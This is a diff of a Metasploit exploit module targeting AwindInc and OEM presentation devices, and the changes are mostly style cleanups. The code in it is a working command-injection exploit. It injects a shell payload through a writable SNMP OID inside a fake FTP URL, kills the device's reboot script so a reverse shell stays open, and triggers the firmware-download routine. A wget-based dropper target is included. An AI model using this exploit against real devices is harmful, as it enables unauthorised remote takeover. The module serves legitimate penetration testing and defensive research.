@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => "AwindInc SNMP Service Command Injection",
+        'Name' => 'AwindInc SNMP Service Command Injection',
         'Description' => %q{
           This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
           A valid SNMP read-write community is required to exploit this vulnerability.
@@ -38,25 +38,27 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
         ],
         'DisclosureDate' => '2019-03-27',
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_ARMLE],
         'Privileged' => true,
         'Targets' => [
           [
             'Unix In-Memory',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Type' => :unix_memory,
-            'Payload' => {
-              'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl' }
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory,
+              'Payload' => {
+                'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl' }
+              }
             }
           ],
           [
             'Linux Dropper',
-            'Platform' => 'linux',
-            'Arch' => ARCH_ARMLE,
-            'CmdStagerFlavor' => %w[wget],
-            'Type' => :linux_dropper
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_ARMLE,
+              'CmdStagerFlavor' => %w[wget],
+              'Type' => :linux_dropper
+            }
           ]
         ],
         'DefaultTarget' => 1,
@@ -108,53 +110,49 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def inject_payload(cmd)
-    begin
-      connect_snmp
-      varbind = SNMP::VarBind.new([1, 3, 6, 1, 4, 1, 3212, 100, 3, 2, 9, 1, 0], SNMP::OctetString.new(cmd))
-      resp = snmp.set(varbind)
-      if resp.error_status == :noError
-        print_status("Injection successful")
-      else
-        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
-      end
-    rescue SNMP::RequestTimeout
-      print_error("#{ip} SNMP request timeout.")
-    rescue Rex::ConnectionError
-      print_error("#{ip} Connection refused.")
-    rescue SNMP::UnsupportedVersion
-      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
-    rescue ::Interrupt
-      raise $!
-    rescue ::Exception => e
-      print_error("Unknown error: #{e.class} #{e}")
-    ensure
-      disconnect_snmp
+    connect_snmp
+    varbind = SNMP::VarBind.new([1, 3, 6, 1, 4, 1, 3212, 100, 3, 2, 9, 1, 0], SNMP::OctetString.new(cmd))
+    resp = snmp.set(varbind)
+    if resp.error_status == :noError
+      print_status('Injection successful')
+    else
+      print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
     end
+  rescue SNMP::RequestTimeout
+    print_error("#{ip} SNMP request timeout.")
+  rescue Rex::ConnectionError
+    print_error("#{ip} Connection refused.")
+  rescue SNMP::UnsupportedVersion
+    print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
+  rescue ::Interrupt
+    raise $!
+  rescue ::Exception => e
+    print_error("Unknown error: #{e.class} #{e}")
+  ensure
+    disconnect_snmp
   end
 
   def trigger
-    begin
-      connect_snmp
-      varbind = SNMP::VarBind.new([1, 3, 6, 1, 4, 1, 3212, 100, 3, 2, 9, 5, 0], SNMP::Integer32.new(1))
-      resp = snmp.set(varbind)
-      if resp.error_status == :noError
-        print_status("Trigger successful")
-      else
-        print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
-      end
-    rescue SNMP::RequestTimeout
-      print_error("#{ip} SNMP request timeout.")
-    rescue Rex::ConnectionError
-      print_error("#{ip} Connection refused.")
-    rescue SNMP::UnsupportedVersion
-      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
-    rescue ::Interrupt
-      raise $!
-    rescue ::Exception => e
-      print_error("Unknown error: #{e.class} #{e}")
-    ensure
-      disconnect_snmp
+    connect_snmp
+    varbind = SNMP::VarBind.new([1, 3, 6, 1, 4, 1, 3212, 100, 3, 2, 9, 5, 0], SNMP::Integer32.new(1))
+    resp = snmp.set(varbind)
+    if resp.error_status == :noError
+      print_status('Trigger successful')
+    else
+      print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
     end
+  rescue SNMP::RequestTimeout
+    print_error("#{ip} SNMP request timeout.")
+  rescue Rex::ConnectionError
+    print_error("#{ip} Connection refused.")
+  rescue SNMP::UnsupportedVersion
+    print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
+  rescue ::Interrupt
+    raise $!
+  rescue ::Exception => e
+    print_error("Unknown error: #{e.class} #{e}")
+  ensure
+    disconnect_snmp
   end
 
   def exploit
@@ -166,25 +164,25 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, _opts = {})
     # The payload must start with a valid FTP URI otherwise the injection point is not reached
-    cmd = "ftp://1.1.1.1/$(#{cmd.to_s})"
+    cmd = "ftp://1.1.1.1/$(#{cmd})"
 
     # When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback
     # We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and
     # keep our reverse shell opened :)
-    cmd << "$(pkill -f /etc/reboot.sh)"
+    cmd << '$(pkill -f /etc/reboot.sh)'
 
     # the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad
-    cmd << "A" * (255 - cmd.length)
+    cmd << 'A' * (255 - cmd.length)
 
     # we inject our payload in camFWUpgradeFTPURL
-    print_status("Injecting payload")
+    print_status('Injecting payload')
     inject_payload(cmd)
 
     # we trigger the firmware download via FTP, which will end up calling this
     # "/bin/getRemoteURL.sh %s %s %s %d"
-    print_status("Triggering call")
+    print_status('Triggering call')
     trigger
   end
 end
